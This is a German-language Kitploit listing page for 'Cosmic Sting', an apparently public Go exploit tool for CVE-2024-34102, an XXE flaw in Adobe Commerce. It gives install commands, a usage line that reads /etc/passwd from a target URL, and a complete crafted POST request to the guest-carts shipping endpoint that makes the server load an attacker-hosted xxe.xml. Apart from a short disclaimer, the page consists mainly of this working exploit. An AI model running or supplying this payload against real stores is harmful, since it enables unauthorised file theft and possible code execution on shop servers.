Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-34102 — Ausnutzung von CVE-2024-34102 | Kitploit
Tools/GitHubGitHub/bughuntar/cve-2024-34102
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubbughuntar/cve-2024-34102

CVE-2024-34102

Ausnutzung von CVE-2024-34102

Repository anzeigen
522vor 2 JahrenNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Cosmic Sting: CVE-2024-34102 Exploit-Tool

Cosmic Sting ist ein in Go geschriebenes Tool, das zur Ausnutzung von CVE-2024-34102, einer Remote-Code-Ausführungs-Schwachstelle, entwickelt wurde.

Details zu CVE-2024-34102

Adobe Commerce Versionen 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 und früher sind von einer Schwachstelle durch unsachgemäße Einschränkung von XML-External-Entity-Referenzen ('XXE') betroffen, die zu beliebiger Codeausführung führen kann. Ein Angreifer könnte diese Schwachstelle ausnutzen, indem er ein präpariertes XML-Dokument sendet, das auf externe Entitäten verweist. Für die Ausnutzung dieses Problems ist keine Benutzerinteraktion erforderlich.

Voraussetzungen

  • Go (1.16 oder höher)

Installation

  1. Klonen Sie das Repository:

    root@kitploit:~
    git clone https://github.com/bughuntar/CVE-2024-34102.git &&
    cd CVE-2024-34102
    
  2. Installieren Sie Abhängigkeiten (falls vorhanden):

    root@kitploit:~
    go version &&
    go mod init cosmic_sting &&
    go get github.com/fatih/color &&
    go get github.com/google/uuid &&
    go get github.com/urfave/cli/v2
    

Einzelne URL

Tool herunterladen

Um das Tool mit einer einzelnen URL auszuführen:

root@kitploit:~
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"

Flags

  • -u, --url : Einzelne URL zum Ausnutzen.
  • -f, --file : Datei zum Lesen per SSRF.
  • -l, --list : Datei mit einer Liste von URLs zum Ausnutzen.

Präparierte XML-DTD-Datei POST-Anforderung:

root@kitploit:~
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}

Lizenz

Dieses Projekt ist nicht lizenziert, nur für persönliche Projekte erstellt.

Mitwirken

Beiträge sind willkommen! Bitte öffnen Sie ein Issue oder reichen Sie einen Pull-Request für Änderungen ein.

Haftungsausschluss

Dieses Tool ist nur für Bildungszwecke bestimmt. Verwenden Sie es verantwortungsvoll und nur auf Systemen, für die Sie eine Testgenehmigung haben.

Autor

Professor the Hunter --> Folgen Sie mir auf Twitter